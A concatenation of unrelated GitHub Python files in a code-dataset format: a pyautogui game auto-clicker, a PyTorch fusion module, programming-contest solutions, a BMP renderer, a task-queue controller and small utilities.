sleep\nfrom PIL import Image\nimport math\nimport operator\nfrom functools import reduce\nimport cv2\nimport pyautogui as pag\nfrom pyautogui import click\nfrom pyautogui import dragTo\nfrom pyautogui import scroll\n\n\ndef compare_pic(pic1, pic2):\n image1 = Image.open(pic1)\n image2 = Image.open(pic2)\n\n histogram1 = image1.histogram()\n histogram2 = image2.histogram()\n\n differ = math.sqrt(\n reduce(operator.add, list(map(lambda a, b: (a - b) ** 2, histogram1, histogram2))) / len(histogram1))\n\n print(differ)\n return differ\n\n\ndef cut_img():\n img = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\n img.save('src_pc/img/tmp.png')\n # cmd1 = \"adb -s \" + serial + \" shell screencap -p /data/tmp.png\"\n # cmd2 = \"adb -s \" + serial + \" pull /data/tmp.png \" + os.path.join(src_path, \"tmp.png\")\n # os.system(cmd1)\n # os.system(cmd2)\n # img = cv2.imread(\"src_pc/img/tmp.png\")\n # newimg = img[1124:384, 1210:599]\n # cv2.imwrite(\"look_ad.png\", newimg)\n\n\ndef look_ad_diff():\n img = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\n img.save('src_pc/img/look_ad_tmp.png')\n # img = cv2.imread(\"src/img/tmp.png\")\n # newimg = img[1124:1210, 384:599]\n # cv2.imwrite(\"src/img/look_ad_tmp.png\", newimg)\n return compare_pic(\"src_pc/img/look_ad_tmp.png\", \"src_pc/img/look_ad.png\")\n\ndef reset_ad_diff():\n reset = pag.screenshot(region=[423, 1010, 84, 44]) # x,y,w,h\n # ad = pag.screenshot(region=[238, 1025, 80, 60]) # x,y,w,h\n reset.save('src_pc/img/reset_tmp.png')\n # ad.save('src_pc/img/ad_tmp.png')\n # ad_diff = compare_pic(\"src_pc/img/ad_tmp.png\", \"src_pc/img/look_ad.png\")\n reset_diff = compare_pic(\"src_pc/img/reset_tmp.png\", \"src_pc/img/reset.png\")\n return reset_diff\n\ndef long_ad():\n long_ad = pag.screenshot(region=[119, 1039, 141, 50])\n long_ad.save('src_pc/img/long_ad_tmp.png')\n long_ad_diff = compare_pic(\"src_pc/img/long_ad_tmp.png\", \"src_pc/img/long_ad.png\")\n return long_ad_diff\n\ndef auto_click():\n start = time.time()\n time_power = 0.5\n time_add_goods = 2\n while True:\n for j in range(3):\n for i in range(10):\n click(162 + i * 36, 1251 + j * 40)\n # if time.time() - start > 20:\n # break\n # sleep(0.5)\n\n # look ad\n if time.time() - start > 60 * time_power:\n click(336, 1132)\n sleep(2)\n if look_ad_diff() < 50:\n click(344, 1051)\n sleep(33)\n click(591, 393)\n sleep(1)\n long_ad_handle()\n sleep(2)\n time_power += 0.5\n time_power += 1\n\n # add goods\n if time.time() - start > 60 * time_add_goods:\n # canteen\n click(492, 1033)\n sleep(1)\n click(492, 1033)\n sleep(2)\n for i in range(2):\n pag.mouseDown(130, 1305)\n pag.moveTo(455, 1305)\n sleep(1)\n click(158, 1316)\n sleep(1)\n click(285, 973)\n sleep(1)\n click(155, 875)\n sleep(1)\n click(511, 692)\n sleep(1)\n # money\n click(446, 1033)\n click(367, 984)\n click(401, 910)\n click(478, 866)\n sleep(1)\n click(158, 1316)\n sleep(1)\n click(61, 1434)\n sleep(2)\n\n # bash_room\n click(445, 928)\n sleep(1)\n click(445, 928)\n sleep(2)\n for i in range(3):\n pag.mouseDown(130, 1305)\n pag.moveTo(455, 1305)\n sleep(1)\n click(158, 1316)\n sleep(1)\n click(338, 1061)\n sleep(1)\n click(225, 945)\n sleep(1)\n click(362, 880)\n sleep(1)\n # money\n click(513, 1150)\n sleep(1)\n click(456, 907)\n sleep(1)\n for i in range(2):\n pag.mouseDown(455, 1305)\n pag.moveTo(130, 1305)\n sleep(1)\n click(158, 1316)\n sleep(1)\n click(290, 1028)\n sleep(1)\n click(61, 1434)\n sleep(2)\n\n time_power += 0.5\n time_add_goods += 2\n\n if time_power > 600:\n break\n\ndef get_position():\n try:\n while True:\n print('Press Ctrl-C to end')\n screenWidth, screenHeight = pag.size() # 获取屏幕的尺寸\n x, y = pag.position() # 返回鼠标的坐标\n print('Screen size: (%s %s), Position : (%s, %s)' % (screenWidth, screenHeight, x, y)) # 打印坐标\n time.sleep(1) # 每个1s中打印一次 , 并执行清屏\n os.system('cls') # 执行系统清屏指令\n except KeyboardInterrupt:\n print('end')\n\ndef long_ad_handle():\n \"\"\"如果是长广告\"\"\"\n if long_ad() < 50:\n click(197, 1061)\n sleep(11)\n click(591, 393)\n sleep(1)\n\ndef canteen_material():\n \"\"\"餐厅泰坦菜品\"\"\"\n while True:\n while True:\n # 增加体力到满\n click(316, 436)\n sleep(1)\n if look_ad_diff() < 100:\n click(330, 1053)\n sleep(2)\n if look_ad_diff() > 100:\n sleep(31)\n click(591, 393)\n sleep(1)\n # 判断是否是长广告\n long_ad_handle()\n click(320, 1159)\n sleep(1)\n else:\n click(320, 1159)\n sleep(1)\n break\n else:\n click(320, 1159)\n sleep(10)\n break\n count = 1\n stop_flag = False\n all_stop_flag = False\n while True:\n if all_stop_flag:\n break\n for j in range(8):\n for i in range(6):\n click(95 + i * 100, 629 + j * 100)\n for i in range(6):\n if count > 30:\n click(95 + i * 100, 629 + j * 100)\n sleep(0.2)\n if reset_ad_diff() < 100:\n click(464, 1031)\n sleep(1)\n stop_flag = True\n count = 1\n break\n else:\n click(95 + i * 100, 629 + j * 100)\n count += 6\n if stop_flag:\n all_stop_flag = True\n break\n # if j == 3 and i\n\n\n\n\nif __name__ == '__main__':\n auto_click()\n # get_position()\n # canteen_material()\n # print(reset_ad_diff())\n # long_ad()\n # cut_img()\n# pag.mouseDown(130, 1305)\n# pag.moveTo(455, 1305)\n# scroll(100, x=235, y=1311)\n#\n","repo_name":"huanhuan18/mywork","sub_path":"自动点击屏幕/pyautogui/game_wudong_hotel/autogui_click.py","file_name":"autogui_click.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10791603427","text":"from __future__ import division\r\nimport torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\n\r\nclass S_Module(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes=1024,\r\n planes=2048,\r\n ):\r\n super(S_Module, self).__init__()\r\n\r\n self.S1 = ConvModule(inplanes, planes, kernel_size=(1, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1), bias=False)\r\n\r\n def forward(self, inputs):\r\n out = []\r\n feat3,feat4 = inputs[0],inputs[1]\r\n out.append(self.S1(feat3))\r\n out.append(feat4)\r\n return out\r\n\r\nclass ConvModule(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes,\r\n planes,\r\n kernel_size,\r\n stride,\r\n padding,\r\n bias=False,\r\n groups=32,\r\n ):\r\n super(ConvModule, self).__init__()\r\n self.conv = nn.Conv3d(inplanes, planes, kernel_size, stride, padding, bias=bias, groups=groups)\r\n self.bn = nn.BatchNorm3d(planes)\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n def forward(self, x):\r\n x1 = self.conv(x)\r\n x1 = self.bn(x1)\r\n out = self.relu(x1)\r\n return out\r\n\r\n\r\nclass MidAggr(nn.Module):\r\n def __init__(\r\n self,\r\n inplanes,\r\n planes,\r\n loss_weight=0.5\r\n ):\r\n super(MidAggr, self).__init__()\r\n self.convs = ConvModule(inplanes, inplanes, kernel_size=(3, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1), bias=False)\r\n\r\n def forward(self, x):\r\n x = self.convs(x)\r\n return x\r\n\r\n\r\nclass T_Module(nn.Module):\r\n def __init__(self,\r\n inplanes,\r\n planes,\r\n downsample_scale=3,\r\n ):\r\n super(T_Module, self).__init__()\r\n\r\n self.conv = nn.Conv3d(inplanes, planes, (3, 1, 1), (1, 1, 1), (1, 0, 0), bias=False, groups=32)\r\n self.pool = nn.MaxPool3d((downsample_scale, 1, 1), (downsample_scale, 1, 1), (0, 0, 0), ceil_mode=True)\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.pool(x)\r\n return x\r\n\r\n\r\nclass Upsampling(nn.Module):\r\n def __init__(self,\r\n scale=(2, 1, 1),\r\n ):\r\n super(Upsampling, self).__init__()\r\n self.scale = scale\r\n\r\n def forward(self, x):\r\n x = F.interpolate(x, scale_factor=self.scale, mode='nearest')\r\n return x\r\n\r\n\r\nclass Downampling(nn.Module):\r\n def __init__(self,\r\n inplanes,\r\n planes,\r\n kernel_size=(3, 1, 1),\r\n stride=(1, 1, 1),\r\n padding=(1, 0, 0),\r\n bias=False,\r\n groups=32,\r\n norm=False,\r\n activation=False,\r\n downsample_position='after',\r\n downsample_scale=(1, 2, 2),\r\n ):\r\n\r\n super(Downampling, self).__init__()\r\n self.conv = nn.Conv3d(inplanes, planes, kernel_size, stride, padding, bias=bias, groups=groups)\r\n self.norm = nn.BatchNorm3d(planes) if norm else None\r\n self.relu = nn.ReLU(inplace=True) if activation else None\r\n assert (downsample_position in ['before', 'after'])\r\n self.downsample_position = downsample_position\r\n self.pool = nn.MaxPool3d(downsample_scale, downsample_scale, (0, 0, 0), ceil_mode=True)\r\n\r\n def forward(self, x):\r\n if self.downsample_position == 'before':\r\n x = self.pool(x)\r\n x = self.conv(x)\r\n if self.norm is not None:\r\n x = self.norm(x)\r\n if self.relu is not None:\r\n x = self.relu(x)\r\n if self.downsample_position == 'after':\r\n x = self.pool(x)\r\n\r\n return x\r\n\r\n\r\nclass CrossFusion(nn.Module):\r\n def __init__(self,\r\n in_channels=[1024, 1024],\r\n mid_channels=[1024, 1024],\r\n out_channels=2048\r\n ):\r\n super(CrossFusion, self).__init__()\r\n\r\n self.m1 = ConvModule(in_channels[0],mid_channels[0],kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False, groups=32)\r\n self.m2 = ConvModule(in_channels[1],mid_channels[1],kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False, groups=32)\r\n\r\n in_dims = np.sum(mid_channels)\r\n self.fusion_conv = nn.Sequential(\r\n nn.Conv3d(in_dims, out_channels, 1, 1, 0, bias=False),\r\n nn.BatchNorm3d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, inputs):\r\n out = [self.m1(inputs[0]),self.m2(inputs[1])]\r\n out = torch.cat(out, 1)\r\n out = self.fusion_conv(out)\r\n return out\r\n\r\nclass Prototype(nn.Module):\r\n\r\n def __init__(self,\r\n in_channels=[1024, 2048],\r\n out_channels=1024\r\n ):\r\n super(Prototype, self).__init__()\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.num_ins = len(in_channels)\r\n self.t_modulation_ops = nn.ModuleList()\r\n self.upsampling_ops = nn.ModuleList()\r\n self.level_fusion_op = CrossFusion()\r\n self.s_modulation = S_Module()\r\n\r\n for i in range(0, self.num_ins, 1):\r\n t_modulation = T_Module(2048,1024)\r\n self.t_modulation_ops.append(t_modulation)\r\n\r\n self.downsampling = Downampling(1024, 1024, kernel_size=(3, 1, 1), stride=(1, 1, 1),\r\n padding=(1, 0, 0), bias=False,downsample_scale = (1, 1, 1))\r\n\r\n out_dims =2048\r\n self.level_fusion_op2 = CrossFusion()\r\n\r\n self.pyramid_fusion_op = nn.Sequential(\r\n nn.Conv3d(out_dims * 2, 2048, 1, 1, 0, bias=False),\r\n nn.BatchNorm3d(2048),\r\n nn.ReLU(inplace=True)\r\n )\r\n self.mid_aggr_3 = MidAggr(1024,1024)\r\n self.mid_aggr_2 = MidAggr(256,256)\r\n self.mid_aggr_1 = MidAggr(128, 128)\r\n\r\n def init_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv3d):\r\n nn.init.kaiming_normal_(m.weight,mode='fan_out', nonlinearity='relu')\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n if isinstance(m, nn.BatchNorm3d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n\r\n def forward(self, inputs_all):\r\n\r\n feat4,feat3,feat2,feat1= inputs_all[0],inputs_all[1],inputs_all[2],inputs_all[3]\r\n\r\n feat3_new = self.mid_aggr_3(feat3)\r\n feat2_new = self.mid_aggr_2(feat2)\r\n feat1_new = self.mid_aggr_1(feat1)\r\n\r\n inputs = [feat3,feat4]\r\n outs = self.s_modulation(inputs)\r\n\r\n outs = [t_modulation(outs[i]) for i, t_modulation in enumerate(self.t_modulation_ops)]\r\n outs0 = outs\r\n\r\n outs[1] = outs[1]+ outs[0]\r\n outs1 = self.level_fusion_op2(outs)\r\n outs = outs0\r\n\r\n if self.downsampling is not None:\r\n outs[1] = outs[1]+self.downsampling(outs[0])\r\n outs = self.level_fusion_op(outs)\r\n\r\n outs = self.pyramid_fusion_op(torch.cat([outs1, outs], 1))\r\n outs = outs.squeeze(2)\r\n feat3_new =feat3_new.squeeze(2)\r\n feat2_new = feat2_new.squeeze(2)\r\n feat1_new = feat1_new.squeeze(2)\r\n return outs,feat3_new,feat2_new,feat1_new","repo_name":"huangxx156/VADNet","sub_path":"models/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"18930189775","text":"import sys\nsys.stdin = open(\"input.txt\")\n\ninput = sys.stdin.readline\n\ndef my_shiftdown(heap, startpos, pos):\n newitem = heap[pos]\n while pos > startpos:\n parentpos = (pos - 1) >> 1\n parent = heap[parentpos]\n if newitem < parent:\n heap_idx.pop(heap[pos])\n heap_idx[parent] = pos\n heap[pos] = parent\n pos = parentpos\n continue\n break\n heap_idx.pop(heap[pos])\n heap_idx[newitem] = pos\n heap[pos] = newitem\n\ndef my_heappush(heap, item):\n size = len(heap)\n heap_idx[item] = size\n heap.append(item)\n my_shiftdown(heap, 1, size)\n\ndef my_shiftup(heap, pos):\n endpos = len(heap)\n startpos = pos # 최상단 인덱스 저장\n newitem = heap[pos]\n\n childpos = 2 * pos + 1\n while childpos < endpos:\n rightpos = childpos + 1\n if rightpos < endpos and not heap[childpos] < heap[rightpos]:\n childpos = rightpos\n heap_idx.pop(heap[pos])\n heap_idx[heap[childpos]] = pos\n heap[pos] = heap[childpos]\n pos = childpos\n childpos = 2 * pos + 1\n\n heap_idx.pop(heap[pos])\n heap_idx[newitem] = pos\n heap[pos] = newitem\n my_shiftdown(heap, startpos, pos) # pop됐던 newitem 자리 찾아주기\ndef my_heappop(heap):\n lastitem = heap.pop()\n\n if heap:\n returnitem = heap[1]\n heap_idx.pop(heap[1])\n heap[lastitem] = 1\n heap[1] = lastitem\n my_shiftup(heap, 1)\n return returnitem\n return lastitem\n\nn = int(input())\narr = [0] + list(map(int, input().split()))\n\nm = int(input()) # 쿼리 수\n\nheap = [0] + [arr[i] for i in range(1, n + 1)]\nheap_idx = {}\nfor i in range(1, n + 1):\n heap_idx[arr[i]] = i\n\nfor i in range(m):\n query = list(map(int, input().split()))\n\n if query[0] == 1: # Ai를 v로 바꾼다.\n heap[heap_idx[arr[query[1]]]] = query[2]\n arr[query[1]] = query[2]\n\n elif query[0] == 2: # heap.pop() -> heap.push()\n min_v = my_heappop(heap)\n print(heap_idx[min_v])\n my_heappush(heap, min_v)\n","repo_name":"WonilLee211/TIL","sub_path":"Algorithm/BOJ/14427_heapq_custom.py","file_name":"14427_heapq_custom.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70832250000","text":"#!/usr/bin/env python\nprint(\"Hello!\")\ntrys=1\npin=\"1234\"\nwhile True: \n user_input = input(\"Please enter your PIN: \") \n print(f'You entered: {user_input}') \n if trys == 3:\n print(\"Account locked. The police is on its way.\")\n break\n elif user_input == pin:\n print(\"Your account balance is: 0. Goodbye!\")\n break\n else:\n trys += 1\n \n","repo_name":"ashfaqrehman/ATMPinCode","sub_path":"atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30176057482","text":"from data_types_module import dword, word, char\nfrom utils import color\n\nBLACK = color(0,0,0)\nWHITE = color(255,255,255)\nRED = color(255,0,0)\n\nclass Render(object):\n\n\t#constructor\n\tdef __init__(self):\n\t\tself.framebuffer = []\n\t\tself.curr_color = WHITE\n\n\tdef glCreateWindow(self, width, height):\n\t\t#width and height for the framebuffer\n\t\tself.width = width\n\t\tself.height = height\n\n\tdef glInit(self):\n\t\tself.curr_color = BLACK\n\t\t\n\n\tdef glViewport(self, x, y, width, height):\n\t\tself.viewportX = x\n\t\tself.viewportY = y\n\t\tself.viewportWidth = width\n\t\tself.viewportHeight = height\n\n\tdef glClear(self):\n\t\tself.framebuffer = [[BLACK for x in range(self.width)] for y in range(self.height)]\n\n\tdef glClearColor(self, r, g, b):\n\t\tclearColor = color( \n\t\t\t\tround(r * 255),\n\t\t\t\tround(g * 255),\n\t\t\t\tround(b * 255)\n\t\t\t)\n\n\t\tself.framebuffer = [[clearColor for x in range(self.width)] for y in range(self.height)]\n\n\tdef glVertex(self, x, y):\n\t\t#las funciones fueron obtenidas de https://www.khronos.org/registry/OpenGL-Refpages/es2.0/xhtml/glViewport.xml\n\t\tX = round((x+1) * (self.viewportWidth/2) + self.viewportX)\n\t\tY = round((y+1) * (self.viewportHeight/2) + self.viewportY)\n\t\tself.point(X,Y)\n\n\tdef glColor(self, r, g, b):\n\t\tself.curr_color = color(round(r * 255),round(g * 255),round(b * 255))\n\n\n\tdef point(self, x, y):\n\t\tself.framebuffer[x][y] = self.curr_color\n\n\n\tdef glFinish(self, filename):\n\t\tarchivo = open(filename, 'wb')\n\n\t\t# File header 14 bytes\n\t\tarchivo.write(char(\"B\"))\n\t\tarchivo.write(char(\"M\"))\n\t\tarchivo.write(dword(14+40+self.width*self.height))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(14+40))\n\n\t\t#Image Header 40 bytes\n\t\tarchivo.write(dword(40))\n\t\tarchivo.write(dword(self.width))\n\t\tarchivo.write(dword(self.height))\n\t\tarchivo.write(word(1))\n\t\tarchivo.write(word(24))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(self.width * self.height * 3))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\t\tarchivo.write(dword(0))\n\n\n\t\t#Pixeles, 3 bytes cada uno\n\n\t\tfor x in range(self.height):\n\t\t\tfor y in range(self.width):\n\t\t\t\tarchivo.write(self.framebuffer[x][y])\n\n\n\t\t#Close file\n\t\tarchivo.close()\n\n\n\n","repo_name":"RobertoFigueroa/BMP-creator","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21992687523","text":"# coding=utf-8\n\nimport logging\n\nfrom enum import Enum\nfrom gevent.queue import JoinableQueue\n\nimport get_time\nfrom controller_msg import msg_dict\n\nlogging.basicConfig(level=\"INFO\")\n\n\nclass DispatchResult(Enum):\n pass\n\n\nclass TaskStatus(Enum):\n pass\n\n\nclass ControllerQueue(object):\n def __init__(self, controller_queue_uuid, group_block, trigger_time):\n self.create_time = get_time.current_ymd_hms()\n # self.create_time = \"2017-01-01 12:00:00\"\n self.group_block = group_block\n self.trigger_time = trigger_time\n self.controller_queue_status = 0\n self.controller_queue_uuid = controller_queue_uuid\n self.controller_todo_task_queue = JoinableQueue()\n self.controller_task_list = list()\n self.controller_task_status_list = list()\n self.controller_task_result_list = list()\n\n def to_dict(self):\n \"\"\"\n 转换为字典\n \"\"\"\n return {\n \"create_time\": self.create_time,\n \"trigger_time\": self.trigger_time,\n \"group_block\": self.group_block,\n \"controller_queue_status\": self.controller_queue_status,\n \"controller_queue_uuid\": self.controller_queue_uuid,\n \"task_list\": self.controller_task_list,\n \"task_result_list\": self.controller_task_result_list,\n \"task_status_list\": self.controller_task_status_list\n }\n\n def put_controller_todo_task_queue(self, task, deserialize=False):\n \"\"\"\n 将task放入controller的待做队列中\n :param task: task\n :param deserialize: 是否是反序列化\n \"\"\"\n task_uuid = task[\"task_uuid\"]\n task_earliest = task[\"earliest\"]\n task_latest = task[\"latest\"]\n if not deserialize:\n self.controller_task_list.append(task)\n self.controller_task_status_list.append({task_uuid: None})\n self.controller_task_result_list.append({task_uuid: None})\n task = task[\"detail\"]\n self.controller_todo_task_queue.put(\n {\"controller_queue_uuid\": self.controller_queue_uuid, \"controller_queue_create_time\": self.create_time,\n \"controller_queue_trigger_time\": self.trigger_time, \"task_uuid\": task_uuid, \"task_earliest\": task_earliest,\n \"task_latest\": task_latest, \"task\": task})\n\n def peek_controller_todo_task_queue(self, task_uuid):\n \"\"\"\n 从controller的待做队列中查询第一个task\n :param task_uuid: task的uuid\n \"\"\"\n if self.controller_todo_task_queue.empty():\n return -1, msg_dict[-11]\n ret = self.controller_todo_task_queue.peek()\n if ret[\"task_uuid\"] == task_uuid:\n return 0, u\"该任务为待执行任务\"\n else:\n return -1, u\"该任务非待执行任务\"\n\n def get_controller_todo_task_queue(self):\n \"\"\"\n 从controller的待做队列中取出task\n \"\"\"\n if self.controller_todo_task_queue.empty():\n return -1, msg_dict[-11]\n if self.controller_queue_status != 0:\n return -1, msg_dict[self.controller_queue_status]\n if not self.controller_todo_task_queue.empty() and self.controller_queue_status == 0:\n task = self.controller_todo_task_queue.get()\n self.controller_queue_status = 11\n return 0, task\n\n def put_left_controller_todo_task_queue(self):\n \"\"\"\n 将失败任务压入待做队列\n \"\"\"\n if self.controller_queue_status != 14:\n # 队列不可恢复\n # return -1, msg_dict[self.controller_queue_status]\n return -1, u'队列状态不可恢复,当前状态: {}'.format(msg_dict[self.controller_queue_status])\n else:\n # 寻找到失败任务的uuid\n fail_task_uuid_list = list()\n for each in self.controller_task_status_list:\n if each.values()[0] and each.values()[0][0] in (1, 2, 3):\n # 如果出现执行失败或者执行超时\n each.update({each.keys()[0]: None})\n fail_task_uuid_list.append(each.keys()[0])\n if not fail_task_uuid_list:\n return -1, u\"队列无失败任务\"\n # 将失败任务先压入队列中\n temp_queue = JoinableQueue()\n for each in self.controller_task_list:\n if each[\"task_uuid\"] in fail_task_uuid_list:\n temp_queue.put(\n {\"controller_queue_uuid\": self.controller_queue_uuid,\n \"controller_queue_create_time\": self.create_time,\n \"controller_queue_trigger_time\": self.trigger_time,\n \"task_uuid\": each[\"task_uuid\"], \"task_earliest\": each[\"earliest\"],\n \"task_latest\": each[\"latest\"], \"task\": each[\"detail\"]}\n )\n # 更改task_status_list和task_result_list\n for each1 in fail_task_uuid_list:\n for each2 in self.controller_task_status_list:\n if each1 == each2.keys()[0]:\n each2.update({each1: None})\n for each2 in self.controller_task_result_list:\n if each1 == each2.keys()[0]:\n each2.update({each1: None})\n # 将原先任务也压入队列\n while not self.controller_todo_task_queue.empty():\n temp_queue.put(self.controller_todo_task_queue.get())\n self.controller_todo_task_queue = temp_queue\n self.controller_queue_status = 0\n return 0, u\"队列失败任务恢复成功\"\n\n def pop_controller_todo_task_queue(self):\n \"\"\"\n 移除待做队列中的第一项\n \"\"\"\n if self.controller_todo_task_queue.empty():\n return -1, msg_dict[-11]\n task = self.controller_todo_task_queue.get()\n task_uuid = task[\"task_uuid\"]\n # 更改任务状态列表\n for each in self.controller_task_status_list:\n for (k, v) in each.iteritems():\n if k == task_uuid:\n each[k] = 4\n return 0, u\"队列第一项移除成功\"\n\n def change_task_info(self, task_uuid, task_status, session, task_result):\n \"\"\"\n 更改task_status_list和task_result_list中的任务状态\n :param task_uuid: task的uuid\n :param task_status: task的状态\n :param session: 用户session\n :param task_result: task的执行结果\n \"\"\"\n if task_status[0] == -1:\n # 任务初始化失败\n self.controller_queue_status = -13\n if task_status[0] == 0:\n # 任务执行成功\n self.controller_queue_status = 0\n if task_status[0] in (1, 121):\n # 任务执行失败\n self.controller_queue_status = 14\n if task_status[0] in (111, 112):\n # 任务等待中\n self.controller_queue_status = 13\n if task_status[0] == 200:\n # 任务开始执行\n if not self.group_block:\n # 非阻塞队列\n self.controller_queue_status = 0\n else:\n # 阻塞队列\n self.controller_queue_status = 12\n # 更改任务状态列表\n for each in self.controller_task_status_list:\n for (k, v) in each.iteritems():\n if k == task_uuid:\n each[k] = (task_status[0], session)\n for each in self.controller_task_result_list:\n for (k, v) in each.iteritems():\n if k == task_uuid and task_result:\n each[k] = task_result.to_dict()\n\n def update_task_info(self, task_uuid, task_info):\n if task_uuid not in map(lambda x: x[\"task_uuid\"], self.controller_task_list):\n return -1, u\"未找到对应任务\"\n else:\n # 更新task_status_list\n for each in self.controller_task_status_list:\n if task_uuid in each.keys():\n if each.get(task_uuid) == 0:\n return -1, u\"成功任务不可更改\"\n else:\n each.update({task_uuid: None})\n # 更新task_result_list\n for each in self.controller_task_result_list:\n if task_uuid in each.keys():\n if isinstance(each.get(task_uuid), list) and each.get(task_uuid)[0] == 0:\n return -1, u\"成功任务不可更改\"\n else:\n each.update({task_uuid: None})\n # 更新task_list\n for each in self.controller_task_list:\n if task_uuid == each.get(\"task_uuid\"):\n self.controller_task_list[self.controller_task_list.index(each)] = task_info\n # 获取todo_task_list\n todo_task_list = filter(lambda x: not x.values()[0], self.controller_task_status_list)\n todo_task_list = map(lambda x: x.keys()[0], todo_task_list)\n # 重新压队列\n self.controller_todo_task_queue = JoinableQueue()\n for task_uuid in todo_task_list:\n for each in self.controller_task_list:\n if each.get(\"task_uuid\") == task_uuid:\n self.controller_todo_task_queue.put(\n {\"controller_queue_uuid\": self.controller_queue_uuid,\n \"controller_queue_create_time\": self.create_time,\n \"controller_queue_trigger_time\": self.trigger_time, \"task_uuid\": task_uuid,\n \"task_earliest\": each.get(\"task_earliest\"), \"task_latest\": each.get(\"task_latest\"),\n \"task\": each.get(\"detail\")})\n self.controller_queue_status = 0\n return 0, u\"更新成功\"\n","repo_name":"rocklym/Unified-OPs-System","sub_path":"TaskManager/controller_queue.py","file_name":"controller_queue.py","file_ext":"py","file_size_in_byte":9909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30570987073","text":"import os\nimport subprocess\nrootdir = os.path.split(__file__)[0]\n\ndef number_in_line(line):\n wordlist = line.split(' ')\n for _, item in enumerate(wordlist):\n try: number = float(item) \n except ValueError: continue\n \n return number\n\ndef pc_error(infile1, infile2, resolution, test_d2=False, DBG=False):\n headers = [\"mseF (p2point)\", \"mseF,PSNR (p2point)\"]\n command = str(rootdir+'/pc_error_d' + \n ' -a '+infile1+ \n ' -b '+infile2+ \n ' --hausdorff=1 '+ \n ' --resolution='+str(resolution))\n if test_d2:\n headers +=[\"mseF (p2plane)\", \"mseF,PSNR (p2plane)\"]\n command = str(command + ' -n ' + infile1)\n results = {} \n subp=subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n subp.wait()\n c=subp.stdout.readline()\n while c:\n if DBG: print(c)\n line = c.decode(encoding='utf-8')\n for _, key in enumerate(headers):\n if line.find(key) != -1:\n value = number_in_line(line)\n results[key] = value\n c=subp.stdout.readline() \n\n return subp, results\n","repo_name":"yydlmzyz/Test-GPCC","sub_path":"pc_error.py","file_name":"pc_error.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"35245149901","text":"# -*- coding: utf-8 -*-\n'''\nlanguage = python\n\nid = Tree tearing\n\nqlink = https://www.hackerearth.com/practice/algorithms/greedy/basics-of-greedy-algorithms/practice-problems/algorithm/tree-tearing-easy-contest/\n\nauthor: amir hejazi\n'''\nfrom collections import defaultdict\nimport sys\n\nsys.setrecursionlimit(100000)\n\n\nk = int(input())\nn = int(input())\n\n\nif n == 1:\n print(0)\nelif k ==1:\n vertices = input()\n print(n)\nelse:\n vertices = list(map(int, input().strip().split())) \n res = 0\n\n def dfs(adj, visited, i, k):\n global res\n des = 1\n visited[i] = True\n for j in adj[i]:\n if not visited[j]:\n des += dfs(adj, visited, j, k)\n \n if des >= k:\n res += 1\n des = 0\n return des\n\n graph = defaultdict(list)\n\n for i in range(2, len(vertices) + 2):\n v = vertices[i - 2]\n graph[i].append(v)\n graph[v].append(i)\n \n\n seen = [False] * (n + 1)\n dfs(graph, seen, 1, k)\n print(res)\n","repo_name":"Amirkhaksar/Hackerearth","sub_path":"Tree tearing/Tree tearing.py","file_name":"Tree tearing.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"72267279759","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\nimport json\n\nimport requests\n\nfrom src.config import *\n\ndef sendmsg(name, text):\n msg = name + ': ' + str(text)\n requests.post(SLACK_URL, data = json.dumps({\n 'text': msg,\n 'username': 'MFcloud',\n }))\n\nif __name__ == '__main__':\n sendmsg('test', 'test dayo-\\nすっごーい!!')\n","repo_name":"Im-neko/timecard","sub_path":"src/msg.py","file_name":"msg.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12465549497","text":"\n# coding: utf-8\n\n\n\n\nimport numpy as np\nimport json\nfrom numpy import genfromtxt\nraw_data = genfromtxt('stp1.csv', delimiter=',', skip_header = 1, dtype=None)\n# 34 - 42\n# 43 - 51\n# 52 - 60\n# 61 - 70\nprint(raw_data[12,])\ndata = raw_data[11:,]\n\n\n# In[131]:\n\n\ncmd_count = 